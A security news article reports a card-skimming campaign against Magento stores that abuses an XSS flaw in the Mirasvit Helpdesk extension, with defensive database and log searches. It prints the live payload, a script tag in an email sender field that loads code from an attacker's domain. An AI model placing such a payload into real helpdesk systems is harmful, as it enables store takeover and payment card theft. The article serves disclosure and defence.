Pierluigi Paganini
December 28, 2017
de Groot observed attackers sending a message like this to Magento merchants:
Hey, I strongly recommend you to make a redesign! Please contact me if you need a good designer! – [email protected]
The message contains a specially crafted sender that triggers an XSS attack.
“Upon closer examination, the message contains a specially crafted sender that contains an XSS attack: an attempt to take control of the backend of a Magento store (archived copy here):”
<script src="https://helpdeskjs.com/jquery.js"></script>@gmail.com“This exploits a flaw in the popular Mirasvit Helpdesk extension. When a helpdesk agent opens the ticket, it will run the code in the background, in the browser of the agent.” wrote de Groot.
The attack exploits one of the flaws discovered in September 2017 by the researchers at the security firm WebShield that affected all versions of the Mirasvit Helpdesk extension until 1.5.2. The company addressed the issued with the release of the version 1.5.3.
When a helpdesk agent opens the ticket, it will run the code for the XSS attack in the background, then a malicious code is added to the footer of the Magento template. In this way, the attacker is able to get its code executed on any page accessed by visitors. The malware used in the attacks spotted by the expert was designed to intercept payments data and send it offshore as the customer types it into the payment form.
“Ultimately, the malware intercepts payments data and send it offshore as the customer types it into the payment form.” de Groot added.
“This attack is particularly sophisticated, as it is able to bypass many security measures that a merchant might have taken. For example, IP restriction on the backend, strong passwords, 2-Factor-Authentication and using a VPN tunnel will not block this attack.”
de Groot suggested to run the following query on the database to find XSS attacks:
SELECT *
FROM `m_helpdesk_message`
WHERE `customer_email` LIKE '%script%'
OR `customer_name` LIKE '%<script%'
OR `body` LIKE '%<script%' \G
and search access logs for modifications of templates through the backend:
$ grep system_config/save/section/design access.log
The expert also published a copy of the malware on GitHub.
Mirasvit published a blog post warning its customers and urging them to update their installs.
| [adrotate banner=”9″] | [adrotate banner=”12″] |
(Security Affairs – Mirasvit Helpdesk, Magento)
[adrotate banner=”5″]
[adrotate banner=”13″]
